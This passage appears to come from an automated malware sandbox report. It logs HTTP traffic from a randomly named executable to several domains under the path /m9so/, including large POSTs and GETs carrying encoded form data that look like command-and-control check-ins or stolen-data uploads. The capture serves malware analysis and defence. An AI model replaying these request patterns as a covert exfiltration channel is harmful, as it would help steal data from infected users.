                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 22 77 77 77 2e 6d 61 6e 75 70 61 69 6e 74 2e 63 6f 6d 22 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 69 66 72 61 6d 65 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 76 77 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 20 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 3c 70 3e 59 6f 75 72 20 75 73 65 72 20 61 67 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 73 2e 20 48 6f 77 65 76 65 72 20 79 6f 75 20 6d 61 79 20 76 69 73 69 74 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 74 68 65 20 70 61 67 65 20 74 68 61 74 20 77 61 73 20 73 75 70 70 6f 73 65 64 20 74 6f 20 62 65 20 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.11.204978946.30.215.63807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:07.208565950 CET1286OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 72 34 38 53 73 58 34 54 71 5a 75 47 77 46 30 78 73 33 58 56 6a 58 7a 32 68 7a 2f 37 69 74 32 70 4c 45 57 50 66 43 30 2f 46 4d 61 31 73 50 50 37 68 58 69 58 59 65 49 37 4c 5a 77 6c 49 56 39 49 4c 35 45 32 43 53 44 71 78 47 52 78 6c 65 6a 62 65 46 43 76 56 57 4f 31 34 2f 5a 6d 46 76 63 34 52 54 52 34 78 48 53 48 62 34 4c 44 4b 61 37 31 65 30 46 37 32 35 42 7a 6b 6b 70 35 69 39 53 73 75 57 52 4e 4d 63 54 70 65 6d 53 4b 47 34 5a 56 38 6b 5a 6f 36 45 36 70 45 37 79 44 62 5a 79 48 71 32 2b 36 6c 67 7a 46 6c 66 38 53 69 42 7a 46 4e 78 59 65 67 4e 67 33 58 65 4b 4a 4b 68 77 39 31 67 52 6c 4a 71 37 31 54 56 70 41 66 55 6d 6c 61 45 69 74 56 5a 68 36 6b 38 35 4e 52 6b 42 6a 55 4d 45 58 70 61 63 33 57 41 71 69 5a 77 63 73 64 65 6f 62 72 64 50 4a 31 73 79 61 6e 43 53 4c 6b 42 34 38 69 51 50 48 72 4e 73 6f 46 70 42 48 6f 35 50 6f 35 6c 4d 62 35 39 5a 38 4b 39 42 76 50 67 44 41 38 78 30 42 51 4a 71 6c 45 4b 7a 37 34 64 32 65 34 42 6c 67 2f 71 36 4f 72 61 47 2f 42 79 6d 56 31 61 54 38 67 76 6b 55 4f 55 31 70 64 6b 63 50 76 49 69 42 77 77 5a 68 53 45 72 54 63 64 63 74 59 4f 5a 62 4a 45 36 6e 56 45 78 6f 58 43 32 6e 4c 44 4a 79 48 6e 52 62 4f 7a 51 4d 57 66 63 37 49 67 51 59 43 58 6b 38 56 76 79 32 4d 51 6b 54 52 69 78 38 6b 45 6a 4a 31 36 32 6b 52 78 57 44 44 36 43 66 79 6c 35 6b 34 57 54 34 78 78 76 55 30 6e 65 6b 4e 54 71 7a 4b 52 43 37 6c 35 59 4f 37 73 61 44 35 2b 73 59 78 46 36 67 57 4b 47 7a 54 37 77 34 7a 36 41 66 61 57 76 4c 4a 59 44 42 66 45 7a 35 37 41 42 79 43 73 63 30 38 57 76 74 59 79 6a 34 37 38 44 4d 32 31 74 59 71 69 4b 72 59 45 51 6a 6e 70 57 31 5a 59 38 59 31 73 33 48 59 6e 65 42 2b 41 4c 4d 35 74 57 71 46 52 5a 2b 62 66 4c 44 64 2b 6c 4e 5a 41 7a 55 64 65 31 41 62 68 68 71 46 6e 55 48 47 41 4a 34 2b 75 4a 7a 2f 5a 70 6f 36 46 4f 6c 66 76 6f 2b 6a 42 6e 32 76 42 75 48 56 4c 66 7a 5a 32 34 39 74 62 4c 66 69 5a 31 55 65 6f 4b 46 4c 74 69 6c 45 66 30 37 6f 2f 63 72 31 48 4d 4d 52 78 65 4c 35 36 4c 31 49 58 39 61 39 51 44 57 47 51 54 58 33 6b 49 6b 63 43 71 78 2f 33 43 51 35 41 4e 32 4c 64 46 65 52 79 73 4b 59 2b 70 4e
                                                                                    Data Ascii: LFPxWlV=r48SsX4TqZuGwF0xs3XVjXz2hz/7it2pLEWPfC0/FMa1sPP7hXiXYeI7LZwlIV9IL5E2CSDqxGRxlejbeFCvVWO14/ZmFvc4RTR4xHSHb4LDKa71e0F725Bzkkp5i9SsuWRNMcTpemSKG4ZV8kZo6E6pE7yDbZyHq2+6lgzFlf8SiBzFNxYegNg3XeKJKhw91gRlJq71TVpAfUmlaEitVZh6k85NRkBjUMEXpac3WAqiZwcsdeobrdPJ1syanCSLkB48iQPHrNsoFpBHo5Po5lMb59Z8K9BvPgDA8x0BQJqlEKz74d2e4Blg/q6OraG/BymV1aT8gvkUOU1pdkcPvIiBwwZhSErTcdctYOZbJE6nVExoXC2nLDJyHnRbOzQMWfc7IgQYCXk8Vvy2MQkTRix8kEjJ162kRxWDD6Cfyl5k4WT4xxvU0nekNTqzKRC7l5YO7saD5+sYxF6gWKGzT7w4z6AfaWvLJYDBfEz57AByCsc08WvtYyj478DM21tYqiKrYEQjnpW1ZY8Y1s3HYneB+ALM5tWqFRZ+bfLDd+lNZAzUde1AbhhqFnUHGAJ4+uJz/Zpo6FOlfvo+jBn2vBuHVLfzZ249tbLfiZ1UeoKFLtilEf07o/cr1HMMRxeL56L1IX9a9QDWGQTX3kIkcCqx/3CQ5AN2LdFeRysKY+pN
                                                                                    Mar 18, 2024 14:49:07.208615065 CET3858OUTData Raw: 77 62 78 4c 32 6d 70 5a 6d 63 39 48 72 6f 33 6c 43 4e 74 59 78 2f 34 66 49 77 44 64 63 6b 48 4b 5a 38 57 6a 78 52 46 2b 4f 4d 6e 4b 59 62 59 6d 6a 33 72 6a 2f 44 38 45 54 6c 6c 66 37 53 45 69 2b 4f 79 66 61 6e 2f 78 63 2f 61 75 34 7a 74 6e 7a 76
                                                                                    Data Ascii: wbxL2mpZmc9Hro3lCNtYx/4fIwDdckHKZ8WjxRF+OMnKYbYmj3rj/D8ETllf7SEi+Oyfan/xc/au4ztnzvy9g6r9dYN25Qs7sclQaRu2lsuXqeyt66e61APkJdDfE1+35r7Eqrvb6vIYzjbNGaTrBJIlQJT83qEhxFDY7SQ0EF7q0/qASFn/aNfQb1EoTevS7rAxgxzRMEM7SuTk8al9RxxWNFUdgFaOBXrF5Ur07GQBYdemlOO
                                                                                    Mar 18, 2024 14:49:07.208666086 CET7716OUTData Raw: 64 59 58 35 41 71 69 6b 37 64 55 7a 44 49 68 30 32 72 71 6b 65 32 6d 4d 56 33 76 2b 36 6f 4d 46 49 75 34 35 6a 43 6f 67 74 4b 51 32 6d 37 77 42 6f 2b 46 52 70 39 75 68 73 34 30 47 38 41 4d 33 42 38 4b 49 79 54 39 73 48 4d 35 41 33 56 4d 77 57 4c
                                                                                    Data Ascii: dYX5Aqik7dUzDIh02rqke2mMV3v+6oMFIu45jCogtKQ2m7wBo+FRp9uhs40G8AM3B8KIyT9sHM5A3VMwWLLRREdcAnLKfNeOhKpdkvfbyKIdTy1ptjnJzevN1hZ/UTt1SOta1+RDOoQfGzaRbnLHORJi0/xphsXO6nHtnV+OxXaicwNhyTtalzCPSkwhRHVX8RBqPdWSXCFB/Db5azC4HeYmzM4JZv/9haNirveB/v6MtXupyFO
                                                                                    Mar 18, 2024 14:49:07.404428005 CET1286OUTData Raw: 59 6c 77 38 6f 64 58 30 65 4f 74 36 39 57 53 39 4c 41 35 73 6d 7a 6f 4c 7a 42 37 4a 63 6b 62 45 62 58 64 6c 30 56 72 74 33 32 56 4d 31 30 7a 35 72 51 39 77 47 65 69 4b 32 61 51 69 58 56 59 76 66 2f 72 36 5a 47 77 75 67 2f 41 38 56 4a 66 31 47 2f
                                                                                    Data Ascii: Ylw8odX0eOt69WS9LA5smzoLzB7JckbEbXdl0Vrt32VM10z5rQ9wGeiK2aQiXVYvf/r6ZGwug/A8VJf1G/3cob96ynyhOJwXwG+rpfE7GXFm4FSZnFO3mS/ieBrl6j7VMA9OdaGfXdbtsvgol7E2BhImPovtPyn8+ZShsVtBR/NjMj3yvyiAw/eccqFSMFPmV9cjnQu81JJj4CLwKpXMmGKVLUriSLePc5auisO99DDavZoguEN
                                                                                    Mar 18, 2024 14:49:07.404474974 CET1286OUTData Raw: 51 65 45 6e 38 74 33 47 54 36 55 75 51 6d 4d 4c 6a 79 38 63 72 51 55 67 6e 63 31 4c 4a 31 4b 69 70 42 36 2f 68 41 34 59 65 63 2f 36 6b 68 61 35 53 6e 79 7a 66 76 73 68 39 59 33 6b 51 61 76 55 37 66 43 71 42 61 71 75 38 68 72 6c 75 58 41 35 78 4f
                                                                                    Data Ascii: QeEn8t3GT6UuQmMLjy8crQUgnc1LJ1KipB6/hA4Yec/6kha5Snyzfvsh9Y3kQavU7fCqBaqu8hrluXA5xOuuiZgjnH4IYfX4RRL87PAGtY5L9SF/Aa9vbE+Z2S3jMka2yP+4yYNiKmRK2na5syz+L+WoFQDqwOM0ColvywZl63dSamCRkPCu2DXqyxW0W1snhr3wXL5lJa+37CcoM+pet1tz8Rn6ON8b0t7g+7TRxwAeee+qGvj
                                                                                    Mar 18, 2024 14:49:07.404525042 CET2572OUTData Raw: 56 41 4b 59 6e 66 6e 6a 4f 43 4c 36 4c 36 6d 75 4d 59 6a 41 61 59 62 7a 67 51 66 76 32 32 57 33 76 35 53 30 49 49 51 4b 73 2f 6e 55 56 31 68 52 56 71 41 54 6c 68 57 79 64 79 39 5a 41 48 39 6c 4b 6e 72 48 68 79 71 69 6c 63 36 4e 78 49 70 45 33 58
                                                                                    Data Ascii: VAKYnfnjOCL6L6muMYjAaYbzgQfv22W3v5S0IIQKs/nUV1hRVqATlhWydy9ZAH9lKnrHhyqilc6NxIpE3XAIf30ak8tvYIoH/j54aZnlgkS+6IxHWvrGQdbOWS9Lc0kABBJJPr58xP7BFcbskL8BFG07QBzlmD74ng38pEXzFigHxyzR50hCL8RtLx/rxmCK+QuH7lP3dcXvDau4w7TFVob1jj4zGfmRWuunoYknIfOYf84fgA9
                                                                                    Mar 18, 2024 14:49:07.405035973 CET7716OUTData Raw: 56 53 78 73 6f 69 76 37 5a 38 6d 50 39 34 50 6e 56 30 58 54 43 42 4c 42 79 6e 71 58 41 6b 69 52 44 67 46 4b 54 6c 37 36 2b 53 58 42 63 61 39 55 6e 49 7a 77 31 53 36 61 6b 48 65 63 4f 2f 2b 59 79 47 6e 70 71 45 71 2b 4c 71 4b 74 43 6b 2b 66 78 67
                                                                                    Data Ascii: VSxsoiv7Z8mP94PnV0XTCBLBynqXAkiRDgFKTl76+SXBca9UnIzw1S6akHecO/+YyGnpqEq+LqKtCk+fxgag6hAIDbUd28PID98GDDoQ/2QD3ibc0Qtn6yZ30aMHirn0UMqmFr95G/ce0Dj1Z9NMILE7Sf5yfVbJ8rJCqCK34HRJyiJfV3TfugANnQ7iqe3XvBQSgmJCdg8l1QcO5MTj4BVi1rlnHutu4PRAsWcHsKtFmKyZAvG
                                                                                    Mar 18, 2024 14:49:07.405205011 CET2572OUTData Raw: 48 55 6a 64 35 36 2f 32 55 75 79 68 76 62 36 66 43 44 71 73 70 42 75 75 5a 57 51 50 65 36 4b 68 61 39 5a 38 72 68 74 63 43 51 32 2f 45 76 56 63 30 62 2f 55 55 58 47 75 58 4a 70 44 2b 37 31 57 4e 7a 64 64 68 77 5a 48 41 76 42 43 63 31 36 73 62 35
                                                                                    Data Ascii: HUjd56/2Uuyhvb6fCDqspBuuZWQPe6Kha9Z8rhtcCQ2/EvVc0b/UUXGuXJpD+71WNzddhwZHAvBCc16sb5fOTFEQnWTbcFCs+uu4o/DOcvcYZC1bytWsvBpa+ocEL2mOQGF3/i3xPPKeKHXaoyFeQTEO2bsvHvoogamir1rzqovtyrBfskscm8paadYD6NYaljyQL492U5Xe0Q6bCOAVFUiu94iIxbbcevgvWVd6lkIZS1vl3V3
                                                                                    Mar 18, 2024 14:49:07.405425072 CET10288OUTData Raw: 67 75 5a 4c 6c 57 45 4a 69 4f 71 6b 49 59 31 73 59 53 6a 78 50 66 34 73 38 42 67 2b 65 58 69 64 56 53 4e 55 55 76 4d 78 2b 43 71 45 38 2b 54 61 79 73 61 5a 51 77 6d 56 6d 36 56 34 76 53 4c 7a 62 64 4e 61 6b 56 2f 51 64 57 42 4b 37 61 6b 72 6f 5a
                                                                                    Data Ascii: guZLlWEJiOqkIY1sYSjxPf4s8Bg+eXidVSNUUvMx+CqE8+TaysaZQwmVm6V4vSLzbdNakV/QdWBK7akroZhthbMISd93An7+YXQ4UCDCOWeNrQbctzme8TOLavK8Xq0qGviIC03n5dooN2KE+b9Bh+dY/Q9AtsoKgysZXiMpVEPhyTmZWJTemJ68l48d22uM8Pw7wZQM2FLL60YjgxzMXDw3Hl9AGl36xbgZcpb/4/2JB9wk+MR
                                                                                    Mar 18, 2024 14:49:07.600302935 CET2572OUTData Raw: 30 41 50 4f 4c 69 2f 48 66 69 6e 6e 59 39 74 46 57 50 34 50 68 6d 32 33 76 53 35 67 77 72 34 57 5a 7a 58 64 43 69 42 73 74 37 71 73 59 73 68 68 75 6d 43 6c 44 43 77 34 32 6e 6d 57 37 35 36 35 4c 6a 38 77 6b 2b 41 41 57 31 68 4f 68 57 35 38 71 48
                                                                                    Data Ascii: 0APOLi/HfinnY9tFWP4Phm23vS5gwr4WZzXdCiBst7qsYshhumClDCw42nmW7565Lj8wk+AAW1hOhW58qHq4nXcn2LJpgoJj9sNCvlnNK9RiaqjX25A31Q3kd1QhlhGkfm9oNJBHoZWlK3PmiqyRnvLnoQ8X6tW2xHOfwMAfgr43KRZLeZNvjfuqHqgnhsaerYHCIBYGGl7ioVvKdmCoenf7md/7wMZloGdD7GsWUCJGwDHVaNs
                                                                                    Mar 18, 2024 14:49:07.600621939 CET2572OUTData Raw: 78 49 63 61 35 45 64 64 4e 78 64 6a 4b 53 47 51 72 58 77 71 32 4b 48 64 63 38 33 30 57 49 48 50 47 58 73 6a 53 4d 42 77 69 37 6e 61 39 70 36 37 39 65 34 43 42 66 61 4f 76 6c 4e 54 79 75 58 33 59 41 69 68 4e 46 71 4c 51 33 61 79 6b 5a 77 55 72 41
                                                                                    Data Ascii: xIca5EddNxdjKSGQrXwq2KHdc830WIHPGXsjSMBwi7na9p679e4CBfaOvlNTyuX3YAihNFqLQ3aykZwUrAgTrJjQXM1evSP/MBWrng+29VDD6x0wZQWJoPrnsWCNuerdI1s0hRS75gnZxfzwlJ6PjSglMbgDyLIOr7Cg93JUvWwxA3WpA/vc5hWmvOUx/VwCJrp1DqP7nFYZxo2rUior4Sd/zPerwnwo+/IbcHAbygljHMfYCb5
                                                                                    Mar 18, 2024 14:49:07.797123909 CET805INHTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 13:59:07 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:49:07 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:49:07 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 56020435387
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 22 77 77 77 2e 6d 61 6e 75 70 61 69 6e 74 2e 63 6f 6d 22 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 69 66 72 61 6d 65 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 76 77 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 20 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 3c 70 3e 59 6f 75 72 20 75 73 65 72 20 61 67 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 73 2e 20 48 6f 77 65 76 65 72 20 79 6f 75 20 6d 61 79 20 76 69 73 69 74 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 74 68 65 20 70 61 67 65 20 74 68 61 74 20 77 61 73 20 73 75 70 70 6f 73 65 64 20 74 6f 20 62 65 20 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.11.204979046.30.215.63807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:09.906007051 CET532OUTGET /m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP+bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k+cOpuPGr7qZ2xBz7I=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.manupaint.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:49:10.084331036 CET1147INHTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 774
                                                                                    Expires: Mon, 18 Mar 2024 13:59:09 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:49:09 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:49:09 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 55968141025
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Accept-Ranges: bytes
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 22 77 77 77 2e 6d 61 6e 75 70 61 69 6e 74 2e 63 6f 6d 22 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 69 66 72 61 6d 65 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 76 77 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 20 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 3f 4c 46 50 78 57 6c 56 3d 6d 36 55 79 76 6a 77 46 33 6f 54 63 39 6d 70 74 34 7a 7a 6f 75 55 79 74 34 77 79 70 32 66 36 5a 66 6b 7a 57 57 56 34 73 57 76 57 31 78 36 6d 2f 6d 6c 50 26 23 34 33 3b 62 50 73 41 62 4c 67 43 4c 6d 39 6b 4c 62 6c 52 45 53 54 65 79 55 56 38 6b 65 50 38 44 31 57 38 59 31 54 38 34 37 78 6d 41 39 41 54 63 43 6c 77 2f 6b 26 23 34 33 3b 63 4f 70 75 50 47 72 37 71 5a 32 78 42 7a 37 49 3d 26 61 6d 70 3b 4f 42 4c 54 4a 3d 55 34 79 68 58 48 36 78 2d 6a 68 58 22 3e 3c 70 3e 59 6f 75 72 20 75 73 65 72 20 61 67 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 73 2e 20 48 6f 77 65 76 65 72 20 79 6f 75 20 6d 61 79 20 76 69 73 69 74 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 3f 4c 46 50 78 57 6c 56 3d 6d 36 55 79 76 6a 77 46 33 6f 54 63 39 6d 70 74 34 7a 7a 6f 75 55 79 74 34 77 79 70 32 66 36 5a 66 6b 7a 57 57 56 34 73 57 76 57 31 78 36 6d 2f 6d 6c 50 26 23 34 33 3b 62 50 73 41 62 4c 67 43 4c 6d 39 6b 4c 62 6c 52 45 53 54 65 79 55 56 38 6b 65 50 38 44 31 57 38 59 31 54 38 34 37 78 6d 41 39 41 54 63 43 6c 77 2f 6b 26 23 34 33 3b 63 4f 70 75 50 47 72 37 71 5a 32 78 42 7a 37 49 3d 26 61 6d 70 3b 4f 42 4c 54 4a 3d 55 34 79 68 58 48 36 78 2d 6a 68 58 22 3e 74 68 65 20 70 61 67 65 20 74 68 61 74 20 77 61 73 20 73 75 70 70 6f 73 65 64 20 74 6f 20 62 65 20 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP&#43;bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k&#43;cOpuPGr7qZ2xBz7I=&amp;OBLTJ=U4yhXH6x-jhX"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP&#43;bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k&#43;cOpuPGr7qZ2xBz7I=&amp;OBLTJ=U4yhXH6x-jhX">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.11.204979191.195.240.19807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:16.488398075 CET829OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.plainpathproductions.com
                                                                                    Origin: http://www.plainpathproductions.com
                                                                                    Referer: http://www.plainpathproductions.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 52 31 31 76 56 77 68 34 5a 75 6f 2f 41 57 62 74 5a 33 6e 72 4a 39 4e 66 66 42 6f 33 6c 70 61 79 34 4f 43 30 4f 42 41 6b 6d 42 79 46 6f 2b 38 56 46 4d 56 34 68 6e 4e 55 65 47 38 4f 54 63 36 44 55 76 4e 38 45 6f 53 36 55 65 39 62 64 4d 49 35 64 2f 2b 68 54 39 61 4e 72 68 38 65 54 51 36 31 59 4b 68 69 71 4a 74 58 79 6d 73 54 33 79 54 63 31 6c 68 77 44 62 4a 35 50 77 32 4b 6f 2f 32 57 55 42 5a 53 48 57 57 68 59 50 4a 6d 59 71 45 52 43 4b 66 69 58 71 6d 77 70 66 74 58 41 43 58 70 58 69 38 68 50 67 41 6e 4e 48 71 31 55 63 7a 5a 49 6f 37 2f 51 2f 71 45 6a 62 4b 4c 4d 51 67 6c 6a 51 3d 3d
                                                                                    Data Ascii: LFPxWlV=R11vVwh4Zuo/AWbtZ3nrJ9NffBo3lpay4OC0OBAkmByFo+8VFMV4hnNUeG8OTc6DUvN8EoS6Ue9bdMI5d/+hT9aNrh8eTQ61YKhiqJtXymsT3yTc1lhwDbJ5Pw2Ko/2WUBZSHWWhYPJmYqERCKfiXqmwpftXACXpXi8hPgAnNHq1UczZIo7/Q/qEjbKLMQgljQ==
                                                                                    Mar 18, 2024 14:49:16.670959949 CET299INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 13:49:16 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
